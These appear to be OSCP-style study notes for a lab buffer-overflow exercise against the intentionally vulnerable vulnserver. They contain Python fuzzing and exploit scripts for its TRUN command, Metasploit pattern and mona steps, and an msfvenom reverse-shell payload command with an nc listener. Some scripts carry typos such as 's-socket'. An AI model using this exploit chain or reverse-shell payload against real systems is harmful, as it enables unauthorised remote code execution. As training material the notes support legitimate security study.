Buffer Overflows
Requirements
Windows - OS (7-10) vulnserver Immunity Debugger
What is BoF?
Anatomy of memory:
Kernel
Stack
Heap
Data
Text
Overflowing the Buffer Space in stack and reach other levels allowing to control them
Steps of BoF
Spiking
Fuzzing
Finding the offset (find the break point)
Overwriting the EIP
Finding bad characters
Finding the Right Module
Generating the shellcode
Root <->
1. Spiking
Open vulnserver using the debugger to see what breaks and so on
From kali
Connect to {ip 9999} using nc Next up we put a bunch of characters to see if we can crash an app using a certain command. generic_send_tcp
^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:
s_readline();
s_string("STATS ");
s_string_variable("0");
STATS <- in this case, should be replaced with the command name to make it specific
Command to send the spike: generic_send_tcp {ip} {port} file.spk 0 0
TRUN command appears to be vulnerable
2. Fuzzing
TRUN is vulnerable so we can now attack it Python fuzzing script
#!/usr/bin/python
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + buffer))
s.close()
sleep(1)
buffer = buffer + "A"*100
except:
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit
3. Finding the offset
Here we want to find the place which we override with the characters tool: /usr/share/metasploit-framework/exploit/pattern_create.rb
Command used:
/usr/share/metasploit-framework/exploit/pattern_create.rb -l 3000
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
Copy the output -> modify the script by replacing offset
with the characters and remove the while
loop (offset is buffer in the old script) Script should look like this:
#!/usr/bin/python
import sys,socket
offset = "{output from pattern_create}"
try:
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + offset))
s.close()
except:
print "Error connecting to the server"
sys.exit()
In the debugger, we could see that 386F4337 appears to be vulnerable Now, let's try something more specific
/usr/share/metasploit-framework/exploit/pattern_offset.rb -l 3000 -q 386F4337
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
# -q emphasizes the target
Output: 2003 <- We can start controlling the EIP with this amount. (Exactly what we wanted)
4. Overwriting the EIP
Editing the script
#!/usr/bin/python
import sys,socket
shellcode = "A" * 2003 + "B" * 4
# 2003 A - when we start overwriting the EIP
try:
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to the server"
sys.exit()
5. Finding Bad Characters
google "badchars" -> Bulbsecurity.com
Copy-paste the badchars variable
Add badchars to the script as a separate varible
Add
+ badchars
toshellcode
Look at the debugger hex dump output If something is off - it's a bad character; Lack of bad characters is what we need
6. Finding the right module
Tool: github.com/corelan/mona Save that script to the machine at C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands
Type !mona modules
in the ImmunityDebugger
In kali: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
We want to convert Assembly code to Hex Type command JMP ESP
-> take FFE4
Go back to immunity debugger and change !mona modules
to !mona find -s "\xff\xe4" -m essfunc.dll
Modify the python script and remove badchars
-> Change "B" *4 to "\xaf\x11\x50\x62"
7-8. Generating Shellcode and Getting Root
Tool: msfvenom Command: msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"
Notes on the command:
# set the module = windows reverse tcp
# LHOST & LPORT = kali ip and port
# Exitfunc = for stability
# -b = bad characters (needs to be set or changed accordingly)
Copy and paste the output to our python code
Make it a separate varible and add to the shellcode
+ overflow
To be 100% sure, it's good to add
+ "\x90" * 32
before the `+overflow+
-> Set up nc listener -> Run the script
Additional: BoF templates
https://github.com/Swafox/OSCP/tree/master/exploit-development
Last updated